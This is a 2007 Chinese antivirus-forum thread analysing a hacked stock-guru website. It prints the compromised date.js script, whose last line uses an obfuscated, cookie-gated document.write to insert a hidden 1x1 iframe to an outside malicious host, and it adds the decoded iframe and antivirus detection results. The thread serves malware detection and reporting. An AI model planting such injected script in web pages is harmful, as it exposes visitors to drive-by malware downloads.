查看: 3618|回复: 11
收起左侧

[已鉴定] 股神"胡立阳" 官网挂马

 关闭 [复制链接]
绅博周幸
发表于 2007-12-15 10:41:11 | 显示全部楼层 |阅读模式
lovewei
发表于 2007-12-15 10:55:37 | 显示全部楼层
找出来了,挂这儿了http://huliyang.com/js/date.js


var day="";
var month="";
var ampm="";
var ampmhour="";
var myweekday="";
var year="";
mydate=new Date();
myweekday=mydate.getDay();
mymonth=mydate.getMonth()+1;
myday= mydate.getDate();
myyear= mydate.getYear();
year=(myyear > 200) ? myyear : 1900 + myyear;
if(myweekday == 0)
weekday=" 星期日 ";
else if(myweekday == 1)
weekday=" 星期一 ";
else if(myweekday == 2)
weekday=" 星期二 ";
else if(myweekday == 3)
weekday=" 星期三 ";
else if(myweekday == 4)
weekday=" 星期四 ";
else if(myweekday == 5)
weekday=" 星期五 ";
else if(myweekday == 6)
weekday=" 星期六 ";
document.write(year+"年"+mymonth+"月"+myday+"日 "+weekday);
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%61%61%2E%6C%6C%73%67%69%6E%67%2E%63%6F%6D%2F%77%77%2F%6E%65%77%32%38%30%2E%68%74%6D%3F%30%31%36%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));}

最后这句,解密出来即
<iframe src=http://aa.llsging.com/ww/new280.htm?016 width=1 height=1></iframe>
绅博周幸
 楼主| 发表于 2007-12-15 10:57:35 | 显示全部楼层
原帖由 lovewei 于 2007-12-15 10:55 发表
找出来了,挂这儿了http://huliyang.com/js/date.js


var day="";
var month="";
var ampm="";
var ampmhour="";
var myweekday="";
var year="";
mydate=new Date();
myweekday=mydate.getDay();
mymon ...



样本捏??? 给个连接啊
绅博周幸
 楼主| 发表于 2007-12-15 10:59:58 | 显示全部楼层
原帖由 绅博周幸 于 2007-12-15 10:57 发表



样本捏??? 给个连接啊



自己抓了

Documents.rar

8.09 KB, 下载次数: 120

绅博周幸
 楼主| 发表于 2007-12-15 11:01:01 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Users\Xing\Documents\Documents.rar'
C:\Users\Xing\Documents\Documents.rar
  [0] Archive type: RAR
  --> nini[1].htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Psyme.ED
  --> bf[1].htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
  --> gege[1].htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      The file was deleted!
gogo8989
发表于 2007-12-15 11:48:00 | 显示全部楼层
有启发报的
BING126
头像被屏蔽
发表于 2007-12-15 15:46:03 | 显示全部楼层
NOD32 MISS
啊弥陀佛
发表于 2007-12-15 16:13:38 | 显示全部楼层
微点砍掉
未命名.JPG
qigang
发表于 2007-12-15 19:19:29 | 显示全部楼层

回复 4楼 绅博周幸 的帖子

网页!

RX20.22.51未杀。
kyotoair
头像被屏蔽
发表于 2007-12-16 19:41:18 | 显示全部楼层
原帖由 绅博周幸 于 2007-12-15 10:41 发表
www.huliyang.com/






股神不是巴菲特吗。。。      
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-14 14:58 , Processed in 0.136458 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表